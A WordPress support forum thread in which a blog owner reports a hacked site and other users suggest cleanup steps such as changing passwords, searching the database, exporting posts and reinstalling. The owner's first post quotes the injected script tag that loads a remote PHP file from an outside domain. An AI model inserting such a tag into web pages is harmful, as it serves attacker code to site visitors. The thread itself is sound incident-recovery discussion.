Support » Fixing WordPress » My blog seems to be hacked !!!

  • Hi there,

    I have recently noticed that my blog – blog.anuspasoap.com has been hacked , since firefox and chrome says that this sites has been attacked.

    Also when I check the source code of the home page there is script which I can see – <script src=http://tpisnj.com/parkhotel/KIDTYPE3.php ></script> I am not able to see this script in header.php

    What should I do? Its also affecting my site http://www.anuspasoap.com , the blog for which is the sub domain.

    Please help.

    Mrunal

Viewing 10 replies - 1 through 10 (of 10 total)
  • search the forum for hacked
    http://wordpress.org/search/hacked?forums=1

    or look here

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    there is alot of detailed info availabale already, it’s hard to repeat it all.

    See FAQ: My site was hacked « WordPress Codex and How to Completely Clean a Hacked WordPress Install. Change your FTP passwords, and look for hidden WordPress adminstrators.

    Thread Starter mrunal13

    (@mrunal13)

    @rvoodoo – I have been through the links u have mentioned, but can you guide me onto how do I remove that script which I have mentioned above.

    @songdogtech – thanks for your advice, same request to you too, where do I find this script so that I can delete it.

    Mrunal

    Can’t guide you really…I followed those links…

    There is no simple answer

    You may have to go through every file and folder on your host, your database, etc. Change your passwords, all of them. Clean everything, then change em again. As long as you are hacked, your passwords are vulnerable.

    I had to reinstall all my programs on my server
    5wp installs, 1 SMF form, 1 wiki, 1 media upload program

    Then I had to comb through all my folders for strage php files that had been uploaded (found 2, buried real deep).

    My server logs show me everything that happens, and they were a lifesaver…I scanned them all for any suspicious activity (that took alot of time)

    Its a pain, and there is no simple solution

    Try Search and Replace « WordPress Plugins to search in your database. But searching with PHPMyAdmin is more complete: How To Completely Clean Your Hacked WordPress Installation | Smackdown!

    Thread Starter mrunal13

    (@mrunal13)

    @ Songdogtech – Search and Replace is not compatibel with 2.8.6 ….let me see if I can find some other plugin like this one.

    Thread Starter mrunal13

    (@mrunal13)

    Now this is what I plan to do tomm –

    1. I will uninstall wordpress from my server. Even delete the database to which it was connected.

    2. There were 15 article on the blog, I have them on my macbook, which I can add them back later.

    3. Check my main site, to know if its affected. If it is then, have it cleant first.

    4. Re-install WordPress fresh.

    5. Add articles from scratch, in the same sequence as they were before and make the blog look like what it looked earlier.

    Is this a good way to go about it…since I dont have a lot of time to spend on this issue.

    This sounds like a good way to go about it, especially if you delete the database and the file folder that contained WordPress. However, do check out your #3 point – if there is a hack, then it might not be contained just in wordpress.

    Sorry this happened to you. It sucks to get hacked.

    @mrunal13
    you could even export your posts from Tools – Export to an XML file. checking this for ‘strange’ code should be easy with 15 posts. On a new install you can import this file to get all posts back.

    I also would ftp the full site content to my pc to have a backup of your wp-content folder. BUT DO NOT JUST UPLOAD THIS FOLDER TO A NEW INSTALLATION, there might be malicious files in there.

    Did you ever just switch to default theme and look if this code is inserted there too?

    Thread Starter mrunal13

    (@mrunal13)

    @ancawonka – The blog and everything related to wordpress id out of server. Now Im working on Point # 3 and life is not so easy.

    @ Joern – I shifted back to the default plugin, but that strange code was still there…..so had to remove my blog and everything related to wordpress….hopefully the main site is sorted quickly and I can get back to Arthemia soon.

Viewing 10 replies - 1 through 10 (of 10 total)
  • The topic ‘My blog seems to be hacked !!!’ is closed to new replies.